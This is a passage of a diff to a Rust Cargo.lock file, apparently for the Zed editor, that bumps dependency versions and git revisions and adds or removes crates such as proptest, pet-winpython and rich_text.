"git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ + "glob", "log", "msvc_spectre_libs", "windows-sys 0.59.0", @@ -12036,7 +12278,7 @@ dependencies = [ [[package]] name = "pet-global-virtualenvs" version = "0.1.0" -source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ "log", "msvc_spectre_libs", @@ -12049,7 +12291,7 @@ dependencies = [ [[package]] name = "pet-homebrew" version = "0.1.0" -source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ "lazy_static", "log", @@ -12059,6 +12301,7 @@ dependencies = [ "pet-fs", "pet-python-utils", "pet-virtualenv", + "rayon", "regex", "serde", "serde_json", @@ -12067,7 +12310,7 @@ dependencies = [ [[package]] name = "pet-jsonrpc" version = "0.1.0" -source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ "env_logger 0.10.2", "log", @@ -12080,7 +12323,7 @@ dependencies = [ [[package]] name = "pet-linux-global-python" version = "0.1.0" -source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ "log", "msvc_spectre_libs", @@ -12093,7 +12336,7 @@ dependencies = [ [[package]] name = "pet-mac-commandlinetools" version = "0.1.0" -source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ "log", "msvc_spectre_libs", @@ -12106,7 +12349,7 @@ dependencies = [ [[package]] name = "pet-mac-python-org" version = "0.1.0" -source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ "log", "msvc_spectre_libs", @@ -12119,7 +12362,7 @@ dependencies = [ [[package]] name = "pet-mac-xcode" version = "0.1.0" -source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ "log", "msvc_spectre_libs", @@ -12132,20 +12375,22 @@ dependencies = [ [[package]] name = "pet-pipenv" version = "0.1.0" -source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ + "lazy_static", "log", "msvc_spectre_libs", "pet-core", "pet-fs", "pet-python-utils", "pet-virtualenv", + "regex", ] [[package]] name = "pet-pixi" version = "0.1.0" -source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ "log", "msvc_spectre_libs", @@ -12157,7 +12402,7 @@ dependencies = [ [[package]] name = "pet-poetry" version = "0.1.0" -source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ "base64 0.22.1", "lazy_static", @@ -12178,7 +12423,7 @@ dependencies = [ [[package]] name = "pet-pyenv" version = "0.1.0" -source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ "lazy_static", "log", @@ -12196,7 +12441,7 @@ dependencies = [ [[package]] name = "pet-python-utils" version = "0.1.0" -source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ "env_logger 0.10.2", "lazy_static", @@ -12213,7 +12458,7 @@ dependencies = [ [[package]] name = "pet-reporter" version = "0.1.0" -source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ "env_logger 0.10.2", "log", @@ -12227,7 +12472,7 @@ dependencies = [ [[package]] name = "pet-telemetry" version = "0.1.0" -source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ "env_logger 0.10.2", "lazy_static", @@ -12242,7 +12487,7 @@ dependencies = [ [[package]] name = "pet-uv" version = "0.1.0" -source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ "log", "pet-core", @@ -12254,7 +12499,7 @@ dependencies = [ [[package]] name = "pet-venv" version = "0.1.0" -source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ "log", "msvc_spectre_libs", @@ -12266,7 +12511,7 @@ dependencies = [ [[package]] name = "pet-virtualenv" version = "0.1.0" -source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ "log", "msvc_spectre_libs", @@ -12278,7 +12523,7 @@ dependencies = [ [[package]] name = "pet-virtualenvwrapper" version = "0.1.0" -source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ "log", "msvc_spectre_libs", @@ -12291,7 +12536,7 @@ dependencies = [ [[package]] name = "pet-windows-registry" version = "0.1.0" -source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ "lazy_static", "log", @@ -12309,7 +12554,7 @@ dependencies = [ [[package]] name = "pet-windows-store" version = "0.1.0" -source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ "lazy_static", "log", @@ -12322,6 +12567,20 @@ dependencies = [ "winreg 0.55.0", ] +[[package]] +name = "pet-winpython" +version = "0.1.0" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" +dependencies = [ + "lazy_static", + "log", + "pet-core", + "pet-fs", + "pet-python-utils", + "pet-virtualenv", + "regex", +] + [[package]] name = "petgraph" version = "0.6.5" @@ -12401,7 +12660,7 @@ dependencies = [ "phf_shared 0.11.3", "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -12414,7 +12673,7 @@ dependencies = [ "phf_shared 0.12.1", "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -12440,15 +12699,14 @@ name = "picker" version = "0.1.0" dependencies = [ "anyhow", - "ctor", "editor", - "env_logger 0.11.8", "gpui", "menu", "schemars", "serde", - "serde_json", + "settings", "theme", + "theme_settings", "ui", "ui_input", "workspace", @@ -12478,7 +12736,7 @@ checksum = "6e918e4ff8c4549eb882f14b3a4bc8c8bc93de829416eacf579f1207a8fbf861" dependencies = [ "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -12557,6 +12815,7 @@ dependencies = [ "settings", "smallvec", "theme", + "theme_settings", "ui", "windows 0.61.3", "workspace", @@ -12709,7 +12968,7 @@ checksum = "af3fb618632874fb76937c2361a7f22afd393c982a2165595407edc75b06d3c1" dependencies = [ "atomic", "crossbeam-queue", - "futures 0.3.31", + "futures 0.3.32", "log", "parking_lot", "pin-project", @@ -12802,7 +13061,7 @@ source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "479ca8adacdd7ce8f1fb39ce9ecccbfe93a3f1344b3d0d97f20bc0196208f62b" dependencies = [ "proc-macro2", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -12866,7 +13125,7 @@ dependencies = [ "proc-macro-error-attr2", "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -12886,19 +13145,20 @@ checksum = "af066a9c399a26e020ada66a034357a868728e72cd426f3adcd35f80d88d88c8" dependencies = [ "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", "version_check", "yansi", ] [[package]] name = "procfs-core" -version = "0.16.0" +version = "0.17.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "2d3554923a69f4ce04c4a754260c338f505ce22642d3830e049a399fc2059a29" +checksum = "239df02d8349b06fc07398a3a1697b06418223b1c7725085e801e7c0fc6a12ec" dependencies = [ "bitflags 2.10.0", "hex", + "serde", ] [[package]] @@ -12917,7 +13177,7 @@ source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "52717f9a02b6965224f95ca2a81e2e0c5c43baacd28ca057577988930b6c3d5b" dependencies = [ "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -12935,14 +13195,13 @@ dependencies = [ "clock", "collections", "context_server", + "credentials_provider", "dap", - "dap_adapters", - "db", "encoding_rs", "extension", - "fancy-regex", + "fancy-regex 0.17.0", "fs", - "futures 0.3.31", + "futures 0.3.32", "fuzzy", "git", "git2", @@ -12960,6 +13219,7 @@ dependencies = [ "node_runtime", "parking_lot", "paths", + "percent-encoding", "postage", "prettier", "pretty_assertions", @@ -12994,6 +13254,7 @@ dependencies = [ "wax", "which 6.0.3", "worktree", + "zed_credentials_provider", "zeroize", "zlog", "ztracing", @@ -13007,7 +13268,7 @@ dependencies = [ "askpass", "clap", "client", - "futures 0.3.31", + "futures 0.3.32", "gpui", "gpui_platform", "http_client", @@ -13031,8 +13292,8 @@ dependencies = [ "collections", "command_palette_hooks", "criterion", - "db", "editor", + "feature_flags", "file_icons", "git", "git_ui", @@ -13054,6 +13315,7 @@ dependencies = [ "telemetry", "tempfile", "theme", + "theme_settings", "ui", "util", "workspace", @@ -13067,7 +13329,7 @@ version = "0.1.0" dependencies = [ "anyhow", "editor", - "futures 0.3.31", + "futures 0.3.32", "fuzzy", "gpui", "language", @@ -13080,6 +13342,7 @@ dependencies = [ "serde_json", "settings", "theme", + "theme_settings", "util", "workspace", ] @@ -13108,7 +13371,7 @@ dependencies = [ "chrono", "collections", "fs", - "futures 0.3.31", + "futures 0.3.32", "fuzzy", "gpui", "handlebars 4.5.0", @@ -13126,6 +13389,47 @@ dependencies = [ "uuid", ] +[[package]] +name = "proptest" +version = "1.10.0" +source = "git+https://github.com/proptest-rs/proptest?rev=3dca198a8fef1b32e3a66f1e1897c955b4dc5b5b#3dca198a8fef1b32e3a66f1e1897c955b4dc5b5b" +dependencies = [ + "bit-set 0.8.0", + "bit-vec 0.8.0", + "bitflags 2.10.0", + "num-traits", + "proptest-macro", + "rand 0.9.2", + "rand_chacha 0.9.0", + "rand_xorshift", + "regex-syntax", + "rusty-fork", + "tempfile", + "unarray", +] + +[[package]] +name = "proptest-derive" +version = "0.8.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "c57924a81864dddafba92e1bf92f9bf82f97096c44489548a60e888e1547549b" +dependencies = [ + "proc-macro2", + "quote", + "syn 2.0.117", +] + +[[package]] +name = "proptest-macro" +version = "0.5.0" +source = "git+https://github.com/proptest-rs/proptest?rev=3dca198a8fef1b32e3a66f1e1897c955b4dc5b5b#3dca198a8fef1b32e3a66f1e1897c955b4dc5b5b" +dependencies = [ + "convert_case 0.11.0", + "proc-macro2", + "quote", + "syn 2.0.117", +] + [[package]] name = "prost" version = "0.9.0" @@ -13157,7 +13461,7 @@ dependencies = [ "itertools 0.10.5", "lazy_static", "log", - "multimap 0.8.3", + "multimap", "petgraph", "prost 0.9.0", "prost-types 0.9.0", @@ -13173,17 +13477,17 @@ source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "22505a5c94da8e3b7c2996394d1c933236c4d743e81a410bcca4e6989fc066a4" dependencies = [ "bytes 1.11.1", - "heck 0.4.1", + "heck 0.5.0", "itertools 0.12.1", "log", - "multimap 0.10.1", + "multimap", "once_cell", "petgraph", "prettyplease", "prost 0.12.6", "prost-types 0.12.6", "regex", - "syn 2.0.106", + "syn 2.0.117", "tempfile", ] @@ -13210,7 +13514,7 @@ dependencies = [ "itertools 0.12.1", "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -13237,11 +13541,9 @@ name = "proto" version = "0.1.0" dependencies = [ "anyhow", - "collections", "prost 0.9.0", "prost-build 0.9.0", "serde", - "typed-path", ] [[package]] @@ -13266,10 +13568,11 @@ dependencies = [ [[package]] name = "psm" -version = "0.1.27" +version = "0.1.30" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "e66fcd288453b748497d8fb18bccc83a16b0518e3906d4b8df0a8d42d93dbb1c" +checksum = "3852766467df634d74f0b2d7819bf8dc483a0eb2e3b0f50f756f9cfe8b0d18d8" dependencies = [ + "ar_archive_writer", "cc", ] @@ -13324,13 +13627,25 @@ checksum = "bd348ff538bc9caeda7ee8cad2d1d48236a1f443c1fa3913c6a02fe0043b1dd3" [[package]] name = "pulley-interpreter" -version = "33.0.2" +version = "36.0.6" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "986beaef947a51d17b42b0ea18ceaa88450d35b6994737065ed505c39172db71" +checksum = "499d922aa0f9faac8d92351416664f1b7acd914008a90fce2f0516d31efddf67" dependencies = [ "cranelift-bitset", "log", - "wasmtime-math", + "pulley-macros", + "wasmtime-internal-math", +] + +[[package]] +name = "pulley-macros" +version = "36.0.6" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "a3848fb193d6dffca43a21f24ca9492f22aab88af1223d06bac7f8a0ef405b81" +dependencies = [ + "proc-macro2", + "quote", + "syn 2.0.117", ] [[package]] @@ -13377,6 +13692,12 @@ dependencies = [ "bytemuck", ] +[[package]] +name = "quick-error" +version = "1.2.3" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "a1d01941d82fa2ab50be1e79e6714289dd7cde78eba4c074bc5a4374f650dfe0" + [[package]] name = "quick-error" version = "2.0.1" @@ -13602,6 +13923,15 @@ dependencies = [ "rand_core 0.6.4", ] +[[package]] +name = "rand_xorshift" +version = "0.4.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "513962919efc330f829edb2535844d1b912b0fbe2ca165d613e4e8788bb05a5a" +dependencies = [ + "rand_core 0.9.3", +] + [[package]] name = "random_choice" version = "0.3.2" @@ -13661,7 +13991,7 @@ dependencies = [ "rand 0.8.5", "rand_chacha 0.3.1", "simd_helpers", - "system-deps", + "system-deps 6.2.2", "thiserror 1.0.69", "v_frame", "wasm-bindgen", @@ -13676,7 +14006,7 @@ dependencies = [ "avif-serialize", "imgref", "loop9", - "quick-error", + "quick-error 2.0.1", "rav1e", "rayon", "rgb", @@ -13706,6 +14036,18 @@ version = "0.6.2" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "20675572f6f24e9e76ef639bc5552774ed45f1c30e2951e1e99c59888861c539" +[[package]] +name = "raw-window-metal" +version = "1.1.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "40d213455a5f1dc59214213c7330e074ddf8114c9a42411eb890c767357ce135" +dependencies = [ + "objc2", + "objc2-core-foundation", + "objc2-foundation", + "objc2-quartz-core", +] + [[package]] name = "rayon" version = "1.11.0" @@ -13778,14 +14120,13 @@ dependencies = [ "anyhow", "askpass", "chrono", - "dap", "db", "dev_container", "editor", "extension", "extension_host", "fs", - "futures 0.3.31", + "futures 0.3.32", "fuzzy", "gpui", "http_client", @@ -13876,7 +14217,7 @@ checksum = "b7186006dcb21920990093f30e3dea63b7d6e977bf1256be20c3563a5db070da" dependencies = [ "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -13969,7 +14310,7 @@ dependencies = [ "base64 0.22.1", "collections", "fs", - "futures 0.3.31", + "futures 0.3.32", "gpui", "log", "parking_lot", @@ -13997,7 +14338,7 @@ dependencies = [ "anyhow", "askpass", "auto_update", - "futures 0.3.31", + "futures 0.3.32", "gpui", "log", "markdown", @@ -14006,7 +14347,7 @@ dependencies = [ "remote", "semver", "settings", - "theme", + "theme_settings", "ui", "ui_input", "workspace", @@ -14027,7 +14368,6 @@ dependencies = [ "collections", "crash-handler", "crashes", - "dap", "dap_adapters", "debug_adapter_extension", "editor", @@ -14036,7 +14376,7 @@ dependencies = [ "extension_host", "fork", "fs", - "futures 0.3.31", + "futures 0.3.32", "git", "git2", "git_hosting_providers", @@ -14059,7 +14399,6 @@ dependencies = [ "paths", "pretty_assertions", "project", - "prompt_store", "proto", "rayon", "release_channel", @@ -14076,6 +14415,7 @@ dependencies = [ "sysinfo 0.37.2", "task", "theme", + "theme_settings", "thiserror 2.0.17", "toml 0.8.23", "unindent", @@ -14083,7 +14423,6 @@ dependencies = [ "uuid", "watch", "windows 0.61.3", - "workspace", "worktree", "zlog", ] @@ -14117,10 +14456,9 @@ dependencies = [ "collections", "command_palette_hooks", "editor", - "env_logger 0.11.8", "feature_flags", "file_icons", - "futures 0.3.31", + "futures 0.3.32", "gpui", "html_to_markdown", "http_client", @@ -14142,11 +14480,13 @@ dependencies = [ "serde", "serde_json", "settings", + "shlex", "smol", "telemetry", "terminal", "terminal_view", "theme", + "theme_settings", "tree-sitter-md", "tree-sitter-python", "tree-sitter-typescript", @@ -14172,7 +14512,6 @@ dependencies = [ "http 0.2.12", "http-body 0.4.6", "hyper 0.14.32", - "hyper-rustls 0.24.2", "hyper-tls", "ipnet", "js-sys", @@ -14182,8 +14521,6 @@ dependencies = [ "once_cell", "percent-encoding", "pin-project-lite", - "rustls 0.21.12", - "rustls-native-certs 0.6.3", "rustls-pemfile 1.0.4", "serde", "serde_json", @@ -14192,7 +14529,6 @@ dependencies = [ "system-configuration 0.5.1", "tokio", "tokio-native-tls", - "tokio-rustls 0.24.1", "tower-service", "url", "wasm-bindgen", @@ -14216,16 +14552,22 @@ dependencies = [ "http-body 1.0.1", "http-body-util", "hyper 1.7.0", + "hyper-rustls 0.27.7", "hyper-util", "js-sys", "log", "percent-encoding", "pin-project-lite", + "quinn", + "rustls 0.23.33", + "rustls-native-certs 0.8.2", + "rustls-pki-types", "serde", "serde_json", "serde_urlencoded", "sync_wrapper 1.0.2", "tokio", + "tokio-rustls 0.26.2", "tower 0.5.2", "tower-http 0.6.6", "tower-service", @@ -14241,8 +14583,7 @@ version = "0.1.0" dependencies = [ "anyhow", "bytes 1.11.1", - "futures 0.3.31", - "gpui", + "futures 0.3.32", "gpui_util", "http_client", "http_client_tls", @@ -14259,12 +14600,15 @@ version = "0.45.1" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "a8928798c0a55e03c9ca6c4c6846f76377427d2c1e1f7e6de3c06ae57942df43" dependencies = [ + "gif", + "image-webp", "log", "pico-args", "rgb", "svgtypes", "tiny-skia", "usvg", + "zune-jpeg", ] [[package]] @@ -14287,20 +14631,6 @@ dependencies = [ "bytemuck", ] -[[package]] -name = "rich_text" -version = "0.1.0" -dependencies = [ - "futures 0.3.31", - "gpui", - "language", - "linkify", - "pulldown-cmark 0.13.0", - "theme", - "ui", - "util", -] - [[package]] name = "ring" version = "0.17.14" @@ -14385,10 +14715,10 @@ dependencies = [ name = "rope" version = "0.1.0" dependencies = [ - "arrayvec", "criterion", "ctor", "gpui", + "heapless", "log", "rand 0.9.2", "rayon", @@ -14425,7 +14755,7 @@ dependencies = [ "async-tungstenite", "base64 0.22.1", "collections", - "futures 0.3.31", + "futures 0.3.32", "gpui", "parking_lot", "proto", @@ -14496,7 +14826,7 @@ dependencies = [ "rope", "serde", "settings", - "theme", + "theme_settings", "ui", "ui_input", "util", @@ -14506,9 +14836,9 @@ dependencies = [ [[package]] name = "runtimelib" -version = "1.2.0" +version = "1.4.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "d80685459e1e5fa5603182058351ae91c98ca458dfef4e85f0a37be4f7cf1e6c" +checksum = "fa84884e45ed4a1e663120cef3fc11f14d1a2a1933776e1c31599f7bd2dd0c9e" dependencies = [ "async-dispatcher", "async-std", @@ -14518,7 +14848,7 @@ dependencies = [ "chrono", "data-encoding", "dirs 6.0.0", - "futures 0.3.31", + "futures 0.3.32", "glob", "jupyter-protocol", "serde", @@ -14532,9 +14862,9 @@ dependencies = [ [[package]] name = "rust-embed" -version = "8.7.2" +version = "8.11.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "025908b8682a26ba8d12f6f2d66b987584a4a87bc024abc5bbc12553a8cd178a" +checksum = "04113cb9355a377d83f06ef1f0a45b8ab8cd7d8b1288160717d66df5c7988d27" dependencies = [ "rust-embed-impl", "rust-embed-utils", @@ -14543,22 +14873,22 @@ dependencies = [ [[package]] name = "rust-embed-impl" -version = "8.7.2" +version = "8.11.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "6065f1a4392b71819ec1ea1df1120673418bf386f50de1d6f54204d836d4349c" +checksum = "da0902e4c7c8e997159ab384e6d0fc91c221375f6894346ae107f47dd0f3ccaa" dependencies = [ "proc-macro2", "quote", "rust-embed-utils", - "syn 2.0.106", + "syn 2.0.117", "walkdir", ] [[package]] name = "rust-embed-utils" -version = "8.7.2" +version = "8.11.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "f6cc0c81648b20b70c491ff8cce00c1c3b223bb8ed2b5d41f0e54c6c4c0a3594" +checksum = "5bcdef0be6fe7f6fa333b1073c949729274b05f123a0ad7efcb8efd878e5c3b1" dependencies = [ "globset", "sha2", @@ -14645,7 +14975,7 @@ dependencies = [ "errno 0.3.14", "libc", "linux-raw-sys 0.11.0", - "windows-sys 0.59.0", + "windows-sys 0.61.2", ] [[package]] @@ -14804,6 +15134,18 @@ version = "1.0.22" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "b39cdef0fa800fc44525c84ccb54a029961a8215f9619753635a9c0d2538d46d" +[[package]] +name = "rusty-fork" +version = "0.3.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "cc6bf79ff24e648f6da1f8d1f011e9cac26491b619e6b9280f2b47f1774e6ee2" +dependencies = [ + "fnv", + "quick-error 1.2.3", + "tempfile", + "wait-timeout", +] + [[package]] name = "rustybuzz" version = "0.20.1" @@ -14880,7 +15222,7 @@ dependencies = [ "backtrace", "chrono", "flume", - "futures 0.3.31", + "futures 0.3.32", "parking_lot", "rand 0.9.2", "web-time", @@ -14898,6 +15240,7 @@ dependencies = [ "serde_json", "settings", "theme", + "theme_settings", ] [[package]] @@ -14923,7 +15266,7 @@ dependencies = [ "proc-macro2", "quote", "serde_derive_internals", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -14984,7 +15327,7 @@ checksum = "1783eabc414609e28a5ba76aee5ddd52199f7107a0b24c2e9746a1ecc34a683d" dependencies = [ "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -15013,7 +15356,7 @@ dependencies = [ "proc-macro-error2", "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -15055,7 +15398,7 @@ dependencies = [ "proc-macro2", "quote", "sea-bae", - "syn 2.0.106", + "syn 2.0.117", "unicode-ident", ] @@ -15104,16 +15447,16 @@ dependencies = [ "any_vec", "anyhow", "bitflags 2.10.0", - "client", "collections", "editor", "fs", - "futures 0.3.31", + "futures 0.3.32", "gpui", "itertools 0.14.0", "language", "lsp", "menu", + "multi_buffer", "pretty_assertions", "project", "serde", @@ -15121,6 +15464,7 @@ dependencies = [ "settings", "smol", "theme", + "theme_settings", "tracing", "ui", "unindent", @@ -15145,6 +15489,15 @@ dependencies = [ "zeroize", ] +[[package]] +name = "secrecy" +version = "0.10.3" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "e891af845473308773346dc847b2c23ee78fe442e0472ac50e22a18a93d3ae5a" +dependencies = [ + "zeroize", +] + [[package]] name = "security-framework" version = "2.11.1" @@ -15240,7 +15593,7 @@ checksum = "d540f220d3187173da220f885ab66608367b6574e925011a9353e4badda91d79" dependencies = [ "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -15251,7 +15604,7 @@ checksum = "18d26a20a969b9e3fdf2fc2d9f21eda6c40e2de84c9408bb5d3b05d499aae711" dependencies = [ "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -15309,7 +15662,7 @@ checksum = "175ee3e80ae9982737ca543e96133087cbd9a485eecc3bc4de9c1a37b47ea59c" dependencies = [ "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -15385,7 +15738,7 @@ dependencies = [ "collections", "ec4rs", "fs", - "futures 0.3.31", + "futures 0.3.32", "gpui", "indoc", "inventory", @@ -15414,7 +15767,7 @@ version = "0.1.0" dependencies = [ "anyhow", "collections", - "derive_more 0.99.20", + "derive_more", "gpui", "log", "schemars", @@ -15449,24 +15802,23 @@ version = "0.1.0" dependencies = [ "quote", "settings", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] name = "settings_profile_selector" version = "0.1.0" dependencies = [ - "client", "editor", "fuzzy", "gpui", - "language", "menu", "picker", "project", "serde_json", "settings", "theme", + "theme_settings", "ui", "workspace", "zed_actions", @@ -15479,9 +15831,7 